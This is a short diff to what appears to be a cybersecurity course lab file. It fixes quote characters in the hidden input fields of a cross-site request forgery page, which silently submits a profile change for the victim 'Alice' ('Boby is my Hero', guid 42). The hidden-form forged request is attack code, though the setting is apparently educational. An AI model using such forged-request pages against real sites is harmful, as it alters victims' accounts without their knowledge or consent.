--- a/distCloudSecurity/forgePostRequest.html
+++ b/distCloudSecurity/forgePostRequest.html
@@ -14,13 +14,13 @@
 
             // The entries are made hidden, so the victim won’t be able to see them.
 
-            fields += "<input type=’hidden’ name=’name’ value=’Alice’>";
+            fields += "<input type='hidden' name='name' value='Alice'>";
 
-            fields += "<input type=’hidden’ name=’briefdescription’ value=’Boby is my Hero’>";
+            fields += "<input type='hidden' name='briefdescription' value='Boby is my Hero'>";
 
-            fields += "<input type=’hidden’ name=’accesslevel[briefdescription]’ value=’2’>";
+            fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";
 
-            fields += "<input type=’hidden’ name=’guid’ value=’42’>";
+            fields += "<input type='hidden' name='guid' value='42'>";
 
             // Create a element.
 
